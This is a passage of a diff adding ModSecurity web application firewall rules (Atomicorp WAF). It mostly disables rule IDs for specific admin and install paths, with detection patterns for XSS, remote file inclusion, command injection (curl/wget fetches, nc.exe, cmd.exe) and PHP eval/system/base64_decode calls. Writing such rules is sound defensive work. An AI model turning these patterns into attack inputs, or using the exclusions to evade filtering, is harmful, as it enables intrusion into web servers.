+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:title|!ARGS:request|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340830,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
+
+SecMarker END_RULES_91499
+
+SecRule REQUEST_FILENAME "/facebook/" "phase:2,id:91500,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/install2\.php" "phase:2,id:91501,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:91502,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"
+
+SecRule REQUEST_FILENAME "/stream/index\.php" "phase:2,id:91503,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340018"
+
+SecRule REQUEST_FILENAME "/secure\.php" "phase:2,id:91504,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709"
+
+SecRule REQUEST_FILENAME "/uplay/" "phase:2,id:91505,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/mapas_admin_edit\.php" "phase:2,id:91506,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:91507,t:none,pass,nolog,skipAfter:END_RULES_91507"
+
+SecRule ARGS|!ARGS:/titulo/|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340831,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/titulo/|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340832,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91507
+
+SecRule REQUEST_FILENAME "/projectpier/" "phase:2,id:91508,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/supportkb\.php" "phase:2,id:91509,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/systemadmin/supportkb\.php" "phase:2,id:91510,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/manage\.php" "phase:2,id:91511,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin_panel/" "phase:2,id:91512,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/inc/php/img\.php" "phase:2,id:91513,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/media/" "phase:2,id:91514,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340164"
+
+SecRule REQUEST_FILENAME "/wizard_forms\.php" "phase:2,id:91515,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/content/types/import" "phase:2,id:91516,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371"
+
+SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:91517,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340014,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=341146,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340213,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340195"
+SecAction "phase:2,id:91518,t:none,pass,nolog,skipAfter:END_RULES_91518"
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|!ARGS:content|!ARGS:fileContent|!ARGS:message|!ARGS:message_html|!ARGS:SAMLResponse|!ARGS:areas|!ARGS:/template/|!ARGS:site_first|!ARGS:sendDescription|!ARGS:templatecode|!ARGS:areas|!ARGS:wpSummary|!ARGS:/keyword/ "(?: ?(?:\bcurl\b|(?:w|ftp)get) (?:http|(?:s|t)?ftp|\- |dict|smb|file|gopher|imap|ldap|pop|rt|scp|smtp|telnet)| ?(?:cmd|command) ?= ?(?:chdir|mkdir|rm) |cd /(?:tmp|/var/tmp|/etc/|/proc|\.\.) |\|id ?\; ?echo.{1,200}\||\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|r?cmd|ftp)\.exe\b|c(?:md|ommand)(?:(?:32)?\.exe\b|\b /[ck])))"         "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:cmdline,t:normalizePath,t:replaceNulls,chain,id:347714,rev:18,severity:2,msg:'Atomicorp.com WAF Rules: CMD injection',logdata:'%{TX.0}',tag:'Command Injection'"
+SecRule REQUEST_URI "!(?:/count\.cgi|^/magento/index\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" "t:none,t:lowercase"
+SecRule ARGS|!ARGS:templatecode|!ARGS:areas|!ARGS:/news/|!ARGS:rsargs|!ARGS:/note/|!ARGS:announcement|!ARGS:/^meta/|!ARGS:SAMLResponse|!ARGS:/content/|!ARGS:/wysiwyg/|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:/comment/|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|system|base64_decode|decode_base64|base64_url_decode|str_rot13)\b ?(?:\(|\:))" 	"phase:2,deny,log,auditlog,status:403,t:none,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:345195,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Base64 Encoded PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91518
+
+SecRule REQUEST_FILENAME "/wp-admin/" "phase:2,id:91519,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=390620,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"
+
+
+SecRule REQUEST_FILENAME "/tstemplate/ts/index\.php" "phase:2,id:91520,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340017"
+
+SecRule REQUEST_FILENAME "/alta\.php" "phase:2,id:91521,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/setup/" "phase:2,id:91522,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:91523,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/settings\.php" "phase:2,id:91524,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/projects/csb/ticket/" "phase:2,id:91525,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144"
+
+SecRule REQUEST_FILENAME "/contenido/main\.php" "phase:2,id:91526,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/orderform/processor\.php" "phase:2,id:91527,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/cgi-bin/soupermail\.pl" "phase:2,id:91528,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/read_dump\.php" "phase:2,id:91529,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin_center/" "phase:2,id:91530,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admincenter/" "phase:2,id:91531,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/homedeveloper\.php" "phase:2,id:91532,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/bevestiging\.php" "phase:2,id:91533,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:91534,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=390615,ctl:ruleRemovebyID=380006"
+
+SecRule REQUEST_FILENAME "/export\.php" "phase:2,id:91535,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/privado/" "phase:2,id:91536,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/webform/configure" "phase:2,id:91537,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/portalcp/vbpoptions\.php" "phase:2,id:91538,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/thubservice\.php" "phase:2,id:91539,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/user\.php" "phase:2,id:91540,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91541,t:none,pass,nolog,skipAfter:END_RULES_91541"
+
+SecRule ARGS|!ARGS:homepage|!ARGS:return|!ARGS:/user/|!ARGS:/pass/|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:www|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340833,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:homepage|!ARGS:return|!ARGS:/user/|!ARGS:/pass/|!ARGS:/icon/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:www|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfile/|!ARGS:page|!ARGS:passwordlogin "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340834,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91541
+
+SecRule REQUEST_FILENAME "/survey/index\.php" "phase:2,id:91542,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91543,t:none,pass,nolog,skipAfter:END_RULES_91543"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/move/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:welcome|!ARGS:changes|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< 